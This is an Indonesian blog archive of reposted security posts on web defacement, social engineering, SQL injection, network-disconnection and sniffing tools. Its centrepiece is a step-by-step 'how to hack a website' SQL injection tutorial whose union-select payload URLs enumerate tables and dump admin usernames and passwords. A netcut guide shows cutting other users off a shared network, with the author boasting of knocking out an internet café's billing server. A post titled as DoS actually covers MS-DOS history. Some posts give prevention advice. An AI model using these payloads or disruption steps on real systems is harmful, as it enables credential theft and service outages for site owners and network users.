RSS

Category Archives: Uncategorized

Image

3.4 Penjelasan detail Deface

3.4.1

deface adalah Aktifitas yang mengotori, “menodai”, merubah inti dari isi halaman suatu website dengan tulisan, gambar, ataupun link yang membuat suatu link menjadi melenceng dari perintah yang kita buat. Sedangkan pengertian dari web deface adalah melakukan perubahan pada halaman web depan pada situs-situs tertentu, dilakukan oleh para hacker atau cracker untuk mengganggu informasi yang dimunculkan pada halaman situs yang dimaksud. Gampangnya web deface adalah menambahkan gambar, tulisan ke suatu web milik orang lain tanpa sepengetahuan adminnya.

Untuk contoh web deface dapat di liat di http://forum.majalahduit.co.id/backup.html, atau jika kalian pengen tau berbagai kumpulan web yang pernah di deface bisa melihatnya di zone-h.org.

Alasan terjadinya web deface antara lain :

  • Dendam atau perasaan tidak puas
  • Intrik politik, ekonomi, sosial
  • Penyampai pesan tertentu
  • Pengen eksis
  • Iseng
  • Prestige <gengsi> dalam golongan
  • Ada kenikmatan tersendiri <merasakan tertantang>

Jenis-jenis pen-Deface-an

ü  full of page

Artinya mendeface satu halaman penuh tampilan depan alias file index atau file lainnya yang akan diubah (deface) secara utuh, artinya untuk melakukan ini biasanya  seorang ‘defacer’ umumnya harus berhubungan secara ‘langsung’ dengan box (mesin) atau usaha mendapatkan priveleged terhadap mesin, baik itu root account or sebagainya yang memungkinkan defacer dapat secara Interaktif mengendalikan file indek dan lainnya secara utuh.umumnya dengan memanfaatkan kelemahan kelemahan pada services services yang berjalan di mesin, sehingga dapat melakukan pengaksesan ke mesin.

 

ü  Sebagian atau hanya menambahi

Artinya, defacer mendeface suatu situs tidak secara penuh, bisa hanya dengan menampilkan beberapa kata, gambar atau penambahan script script yang mengganggu, hal ini umumnya hanya akan memperlihatkan tampilan file yang di deface menjadi kacau dan umumnya cukup mengganggu, defacer biasanya mencari celah baik dari kelemahan scripting yang digunakan dengan XSS injection, bisa dengan SQL atau database injection

Sumber : http://cgeduntuksemua.blogspot.com/2012/05/pengertian-web-deface.html

Teknik Web Deface dan Cara Menanggulangginya

 

Meneruskan posting sebelumnya tentang pengertian web deface, kali ini saya akan tunjukan beberapa teknik dari web deface, dan juga cara pencegahanya. Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi.

Defacer website dapat merubah tampilan sebagian atau seluruhnya tergantung kemauan defacer dan lubang yang bisa dimasuki, namun jika dia sudah putus asa, defacer akan melakukan denial of servis (DoS) attack yaitu mengirimkan request palsu pada server yang berlebihan sehingga kerja server lambat dan lama-kelamaan server akan crash dan down.Untuk dapat melakukan web deface, defacer melakukan beberapa tahap sebagai berikut :

  1. Mencari kelemahan pada sistem security, menemukan celah yang dapat dimasuki untuk melakukan eksplorasi di server target. Dia akan melakukan scanning tentang sistem operasi, service pack, service yang enable, port yang terbuka, dan lain sebagainya. Kemudian dianalisa celah mana yang bisa dimasuki.
  2. Melakukan penyusupan ke server korban. Teknik ini dia akan menggunakan beberapa tools, file yang akan disisipkan, file exploit yang dibuat sengaja untuk di-copy-kan. Setelah berhasil masuk , tangan-tangan defacer bisa mengobok-obok isi server. Tapi tidak adil kiranya jika hanya sharing tentang teknik deface web. Maka untuk pengelola situs harus waspada, karena deface bisa jadi bencana yang sangat merepotkan. Pekerjaan menata ulang dan memperbaiki bagian yang rusak, bukan pekerjaan yang mudah.

Karena itu sebelum situs anda digerayangi seyogyanya melakukan langkah-langkah preventif sebagai berikut :

  • Rutin melakukan update, upgrade dan patch pada sistem operasi dan aplikasi-aplikasi yang dipakai.
  • Memeriksa ulang dan memperbaiki konfigurasi pada sistem operasi, web server dan aplikasi lainnya.
  • Menganalisa kembali service-service yang aktif, matikan jika tidak perlu.
  • Mengatur jadwal untuk melakukan backup data penting, file konfigurasi sistem, database, sehingga jika sewaktu-waktu terjadi deface, anda tinggal menggunakan data backup.
  • Melindungi server dengan firewall dan IDS. Kedua tools ini ampuh untuk mengatasi serangan Denial of service(DoS) attack.
  • Selalu memperhatikan hal-hal yang mencurigakan pada server, baca log system operasi, log web server ataupun log aplikasi.
  • Melakukan vulnerability scanning secara rutin, juga melakukan private security test.

Sumber : http://cgeduntuksemua.blogspot.com/2012/05/teknik-web-deface-dan-cara.html

 
Leave a comment

Posted by on March 5, 2013 in Uncategorized

 

3.3 Penjelasan detail Social Engineering

Social engineering (keamanan)

Dari Wikipedia bahasa Indonesia, ensiklopedia bebas

Social engineering adalah pemerolehan informasi atau maklumat rahasia/sensitif dengan cara menipu pemilik informasi tersebut. Social engineering umumnya dilakukan melalui telepon atau Internet. Social engineering merupakan salah satu metode yang digunakan oleh hacker untuk memperoleh informasi tentang targetnya, dengan cara meminta informasi itu langsung kepada korban atau pihak lain yang mempunyai informasi itu.

Social engineering mengkonsentrasikan diri pada rantai terlemah sistem jaringan komputer, yaitu manusia. Seperti kita tahu, tidak ada sistem komputer yang tidak melibatkan interaksi manusia. Dan parahnya lagi, celah keamanan ini bersifat universal, tidak tergantung platform, sistem operasi, protokol, software ataupun hardware. Artinya, setiap sistem mempunyai kelemahan yang sama pada faktor manusia. Setiap orang yang mempunyai akses kedalam sistem secara fisik adalah ancaman, bahkan jika orang tersebut tidak termasuk dalam kebijakan kemanan yang telah disusun. Seperti metoda hacking yang lain, social engineering juga memerlukan persiapan, bahkan sebagian besar pekerjaan meliputi persiapan itu sendiri.

Faktor utama

Di balik semua sistem keaman dan prosedur-prosedur pengamanan yang ada masih terdapat faktor lain yang sangat penting, yaitu : manusia.

Pada banyak referensi, faktor manusia dinilai sebagai rantai paling lemah dalam sebuah sistem keamanan. Sebuah sistem keamanan yang baik, akan menjadi tidak berguna jika ditangani oleh administrator yang kurang kompeten. Selain itu, biasanya pada sebuah jaingan yang cukup kompleks terdapat banyak user yang kurang mengerti masalah keamanan atau tidak cukup peduli tentang hal itu. Ambil contoh di sebuah perusahaan, seorang network admin sudah menerapkan kebijakan keamanan dengan baik, namun ada user yang mengabaikan masalah kemanan itu. Misalnya user tersebut menggunakan password yang mudah ditebak, lupa logout ketika pulang kerja, atau dengan mudahnya memberikan akses kepada rekan kerjanya yang lain atau bahkan kepada kliennya. Hal ini dapat menyebabkan seorang penyerang memanfaatkan celah tersebut dan mencuri atau merusak datadata penting perusahaan.

Atau pada kasus di atas, seorang penyerang bisa berpura-pura sebagai pihak yang berkepentingan dan meminta akses kepada salah satu user yang ceroboh tersebut. Tindakan ini digolongkan dalam Social Engineering.

Metode

Metode pertama adalah metode yang paling dasar dalam social engineering, dapat menyelesaikan tugas penyerang secara langsung yaitu, penyerang tinggal meminta apa yang diinginkannya: password, akses ke jaringan, peta jaringan, konfigurasi sistem, atau kunci ruangan. Memang cara ini paling sedikit berhasil, tapi bisa sangat membantu dalam menyelesaikan tugas penyerang.

Cara kedua adalah dengan menciptakan situasi palsu dimana seseorang menjadi bagian dari situasi tersebut. Penyerang bisa membuat alasan yang menyangkut kepentingan pihak lain atau bagian lain dari perusahaan itu, misalnya. Ini memerlukan kerja lanjutan bagi penyerang untuk mencari informasi lebih lanjut dan biasanya juga harus mengumpulkan informasi tambahan tentang ‘target’. Ini juga berarti kita tidak harus selalu berbohong untuk menciptakan situasi tesebut, kadangkala fakta-fakta lebih bisa diterima oleh target.

Sebagai contoh seperti ini: seorang berpura-pura sebagai agen tiket yang menelepon salah satu pegawai perusahaan untuk konfirmasi bahwa tiket liburannya telah dipesan dan siap dikirim. Pemesanan dilakukan dengan nama serta posisi target di perusahaan itu, dan perlu mencocokkan data dengan target. Tentu saja target tidak merasa memesan tiket, dan penyerang tetap perlu mencocokkan nama, serta nomor pegawainya. Informasi ini bisa digunakan sebagai informasi awal untuk masuk ke sistem di perusahaan tersebut dengan account target. Contoh lain, bisa berpura-pura sedang mengadakan survei hardware dari vendor tertentu, dari sini bisa diperoleh informasi tentang peta jaringan, router, firewall atau komponen jaringan lainnya.

Cara yang populer sekarang adalah melalui e-mail, dengan mengirim e-mail yang meminta target untuk membuka attachment yang tentunya bisa kita sisipi worm atau trojan horse untuk membuat backdoor di sistemnya. Kita juga bisa sisipkan worm bahkan dalam file .jpg yang terkesan “tak berdosa” sekalipun.

Cara-cara tersebut biasanya melibatkan faktor personal dari target: kurangnya tanggung jawab, ingin dipuji dan kewajiban moral. Kadang target merasa bahwa dengan tindakan yang dilakukan akan menyebabkan sedikit atu tanpa efek buruk sama sekali. Atau target merasa bahwa dengan memenuhi keinginan penyerang-yang berpura-pura akan membuat dia dipuji atau mendapat kedudukan ynag lebih baik. Atau dia merasa bahwa dengan melakukan sesuatu akan membantu pihak lain dan itu memang sudah kewajibannya untuk membantu orang lain. Jadi kita bisa fokuskan untuk membujuk target secara sukarela membantu kita, tidak dengan memaksanya. Selanjutnya kita bisa menuntun target melakukan apa yang kita mau, target yakin bahwa dirinya yang memegang kontrol atas situasi tersebut. Target merasa bahwa dia membuat keputusan yang baik untuk membantu kita dan mengorbankan sedikit waktu dan tenaganya. Semakin sedikit konflik semakin baik. kopral garenx seorang penguasa hacker.

Riset psikologi juga menunjukkan bahwa seorang akan lebih mudah memenuhi keinginan jika sebelumnya sudah pernah berurusan, sebelum permintaan inti cobalah untuk meminta target melakukan hal-hal kecil terlebih dahulu.

Sumber :

http://id.wikipedia.org/wiki/Social_engineering_%28keamanan%29

 
Leave a comment

Posted by on March 5, 2013 in Uncategorized

 

3.2 Penjelasan detail tentang DOS

Sejarah

MS-DOS sebenarnya dibuat oleh sebuah perusahaan pembuat komputer bernama Seattle Computer Products (SCP) yang dikepalai oleh Tim Patterson–yang belakangan direkrut oleh Microsoft untuk mengembangkan DOS–pada tahun 1980 sebagai sebuah perangkat lunak sistem operasi dengan nama Q-DOS (singkatan dari Quick and Dirty Operating System), yang selanjutnya diubah namanya menjadi 86-DOS, karena Q-DOS didesain agar dapat berjalan pada komputer dengan prosesor Intel 8086. Microsoft pun membeli lisensinya dengn harga 50.000 dolar Amerika dari SCP, lalu mengubah namanya menjadi MS-DOS. Selanjutnya, saat IBM hendak meluncurkan komputer pribadi yang disebut dengan IBM PC, Microsoft pun menjual lisensi MS-DOS kepada IBM.
Pengembangan
IBM dan Microsoft selanjutnya merilis versi-versi DOS; di mana versi IBM yang langsung dibundel dengan komputer IBM PC disebut dengan “IBM PC-DOS” (singkatan dari International Business Machine Personal Computer Disk Operating System). Pada awalnya, IBM hanya menggunakan apa yang layak digunakan dari MS-DOS yang dirilis oleh Microsoft, seperti program-programnya atau utilitas yang disertakannya. Karena itulah, versi IBM selalu dirilis lebih lambat dibandingkan dengan versi MS-DOS. Tapi, MS-DOS versi 4.0 adalah versi MS-DOS pertama yang benar-benar sama seperti IBM PC-DOS, karena Microsoft sedang berkonsenstrasi untuk mengembangkan sebuah sistem operasi penerus DOS, yang disebut dengan OS/2.
baca Selanjutnya,,,
 
Leave a comment

Posted by on March 5, 2013 in Uncategorized

 

3.1 Penjelasan detail tentang SQL Injection

Sekilas SQL INJECTION

SQL injection adalah jenis aksi hacking pada keamanan komputer di mana seorang penyerang bisa mendapatkan akses ke basis data di dalam sistem. SQL injection yaitu serangan yang mirip dengan serangan XSS dalam bahwa penyerang memanfaatkan aplikasi vektor dan juga dengan Common dalam serangan XSS.

SQL injection exploits dan sejenisnya adalah hasil interfacing sebuah bahasa lewat informasi melalui bahasa lain . Dalam hal SQL injection, sebuah bahasa pemrograman seperti PHP atau Perl mengakses database melalui SQL query. Jika data yang diterima dari pengguna akhir yang dikirim langsung ke database dan tidak disaring dengan benar, maka yang penyerang dapat menyisipkan perintah SQL nya sebagai bagian dari input.

Setelah dijalankan pada database, perintah ini dapat mengubah, menghapus, atau membeberkan data sensitif.Lebih parah lagi jika sampai ke sistem eksekusi kode akses yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.

Cara pencegahan SQL INJECTION

ü Batasi panjang input box (jika memungkinkan), dengan cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.

ü Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).

ü Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.

ü Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.

ü Ubah “Startup and run SQL Server” menggunakan low privilege user di SQL Server Security tab.

Sumber Asli : Budi Raharjo, ”Keamanan Sistem Informasi Berbasis Internet”, PT Insan Indonesia & PT INDOCISC, Jakarta,2002.

Sumber :http://de-kill.blogspot.com/2009/04/sekilas-sql-injection.html

Tips Cara Hacking Website dengan Teknik SQL

SQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi clien dengan cara memodifikasi Injectionperintah SQL yang ada dimemori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk menyimpan data.

3.1.1

Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL :

Karakter : ‘ atau –

Commants : /* atau –

 [ Step 1 ]

  • Carilah target
    Misal: [site]/berita.php?id=100

Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100’ atau
[site]/berita.php?id=-100
Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]

[ Step 2 ]

  • Mencari dan menghitung jumlah table yang ada dalam databasenya…
    gunakan perintah: order by

Contoh:

[site]/berita.php?id=-100+order+by+1– atau
[site]/berita.php?id=-100+order+by+1/*

Ceklah secara step by step (satupersatu)…
Misal:

[site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–
[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–

Sehingga muncul error atau hilang pesan error…
Misal: [site]/berita.php?id=-100+order+by+9–

Berarti yang kita ambil adalah sampai angka 8
Menjadi [site]/berita.php?id=-100+order+by+8–

[ Step 3 ]

  • untuk mengeluarkan angka berapa yang muncul gunakan perintah union
    karena tadi error sampai angka 9
    maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–

Lihat versi yang digunakan se’umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..

[ Step 4 ]

  • Untuk menampilkan table yang ada pada web tersebut adalah
    perintah table_name >>> dimasukan pada angka yangg keluar tadi
    perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–

Se’umpama table yang muncul adalah “admin”

[ Step 5 ]

  • untuk menampilkan semua isi dari table tersebut adalah
    perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. ​tables+where+table_schema=database()–

[ Step 6 ]

  • Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.columns+where+table_name=0xhexa– >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0xhexa–

Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
Website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

Contoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E–

[ Step 7 ]

  • Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan caraperintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
    perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhirContoh :[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–

    Contoh kata yang keluar adalah id,username,password

    Contoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin–

[ Step 8 ]

  • Tahap terakhir mencari halaman admin atau login.

Sekian postingan saya kali ini tentang Cara Hacking Website Dengan Teknik SQL Injection, tutorial hacking yang lain akan menyusul, Jadi mampir terus kesini ya 😀

Source: Hacker Newbie

Sumber :

http://cirebon-cyber4rt.blogspot.com/2012/03/cara-hacking-website-dengan-teknik-sql.html

 
Leave a comment

Posted by on March 5, 2013 in Uncategorized

 

2.3 Tools untuk Menguasai Komputer Lain

Menguasai Bandwidth dan Memutuskan Jaringan Komputer Lain

2.2.2.2

Ada banyak cara untuk membuat Disonnection (biasa disebut DC) komputer lain yang masih dalam satu jaringan, seperti dalam satu warnet, kantor dan lain sebagainya. Cara yang paling mudah ialah menggunakan software. Ukuran software ini nggak terlalu besar 1.806 KB dan cara penggunaannya juga simple dan mudah. Tinggal kita cari IP sasaran, yang sedang aktif kemudian klik “Cut Off “,,,,,pasti jaringan internet (network) komputer yang di-cut akan mati.

Caranya:
1. Download netcut disini
2. Install sampai selesai
3. Cari IP target diantara IP list yang telah terbaca di software tersebut
4. Klik “Cut Off”.

Kemudian anda akan menyaksikan jaringan internet atau network komputer sasaran kita dalam keadaan disconnection (Off). Sedang untuk mengembalikan kalian tinggal klik IP yang di-cut selanjutnya klik “resume”. Mudah kan…??? Tapi ada baiknya anda cek dulu IP anda sendiri, biar ga salah Cut gitu…

Sedikit cerita tentang pengalaman menggunakan netcut ini, saya sampai di “BlackList” oleh salah satu warnet di sekitar perumahan tempat saya tinggal karena saya meng-cutoff server Billing-nya,hehe…. Sebabnya adalah saya kesal karena sewaktu saya download sebuah program (AVIRA_9 yang sizenya 29 Mb), komputernya tiba-tiba nge-restart sendiri sehingga file yang saya download tadi (padahal tinggal 20% lagi) hilang. Emosi memuncak, saya install netcut, jalanin programnya, cut off semua computer disana termasuk Billing, langsung saya disconnect, bayar trus pulang dengan perasaan kesal. Besoknya saya ke warnet tadi dengan tampang ga bersalah (ga tau malu banget deh), eh baru nyampe di sana saya dihampiri sama salah satu penjaga warnetnya. dia bilang “Bli (panggilan mas untuk orang Bali),, jangan maen di sini lagi. Kemaren bos saya marah-marah soalnya koneksinya bli mainin”. Gitu katanya…

Sumber : http://alanlanalan.blogspot.com/2011/05/menguasai-bandwidth-dan-memutuskan.html

 
Leave a comment

Posted by on March 5, 2013 in Uncategorized

 
Image

2.2 Tools Untuk Remote Komputer Lain

A.      Dasar Teori

Remote PC adalah sebuah teknologi yang mengijinkan kita untuk terhubung dengan komputer lain seperti kita duduk di depan komputer yang kita remote tersebut. Kita dapat melihat layar monitor yang kita remote, merubah ukuran layar, mengendalikan mouse dan keyboard, menjalankan aplikasi program sesuai dengan yang kita inginkan seperti komputer itu ada di depan kita sendiri.

Remote komputer dapat berjalan di atas jaringan Local Area Network(LAN), Wide Area Network(WAN), internet dan dapat juga melalui komunikasi langsung (direct communication) melalui modem to modem menggunakan teknologi dial-in dan dial-up.

a.       Perbedaan Host Komputer dan Remote Komputer

Dalam komunikasi dua komputer atau lebih yang menggunakan teknologi remote komputer maka ada 2 fungsi komputer yang terlibat yaitu ada yang menjadi host/client komputer dan ada yang menjadi remote komputer. Host/CLient komputer adalah komputer yang digunakan untuk mengendalikan /meremote komputer lain sedangkan Remote komputer adalah komputer yang sedang dikendalikan oleh komputer lain. Ketika sebuah komputer di remote oleh komputer lain (host komputer), maka apa yang nampak di host komputer juga terjadi di komputer yang di remote, namun hal ini juga tergantung pada batasan akses yang diberikan oleh remote komputer ke host komputer.

Baca Selengkapnya,,,

 
Leave a comment

Posted by on March 5, 2013 in Uncategorized

 

2.1 Mengintip data yang mengalir melalui jaringan

Tools untuk mengintip data yang mengalir mulai jaringan

1. Wireshark

Wireshark adalah penganalisis paket gratis dan sumber terbuka. Perangkat ini digunakan untuk pemecahan masalah jaringan, analisis, perangkat lunak dan pengembangan protokol komunikasi, dan pendidikan. Awalnya bernama Ethereal, pada Mei 2006 proyek ini berganti nama menjadi Wireshark karena masalah merek dagang.

2. Sniffer

Sniffer Paket, yang juga dikenal sebagai Network Analyzers atau Ethernet Sniffer ialah sebuah aplikasi yang dapat melihat lalu lintas data pada jaringan komputer. Dikarenakan data mengalir secara bolak-balik pada jaringan, aplikasi ini menangkap tiap-tiap paket dan kadang-kadang menguraikan isi dari RFC (Request for Comments) atau spesifikasi yang lain. Berdasarkan pada struktur jaringan (seperti hub atau switch), salah satu pihak dapat menyadap keseluruhan atau salah satu dari pembagian lalu lintas dari salah satu mesin di jaringan. Perangkat pengendali jaringan dapat pula diatur oleh aplikasi penyadap untuk bekerja dalam mode campur-aduk (promiscuous mode) untuk “mendengarkan” semuanya (umumnya pada jaringan kabel).

Sniffer paket dapat dimanfaatkan untuk hal-hal berikut:

  • Mengatasi permasalahan pada jaringan komputer.
  • Mendeteksi adanya penyelundup dalam jaringan (Network Intusion).
  • Memonitor penggunaan jaringan dan menyaring isi isi tertentu.
  • Memata-matai pengguna jaringan lain dan mengumpulkan informasi pribadi yang dimilikanya (misalkan password).
  • Dapat digunakan untuk Reverse Engineer pada jaringan.
 
Leave a comment

Posted by on March 5, 2013 in Uncategorized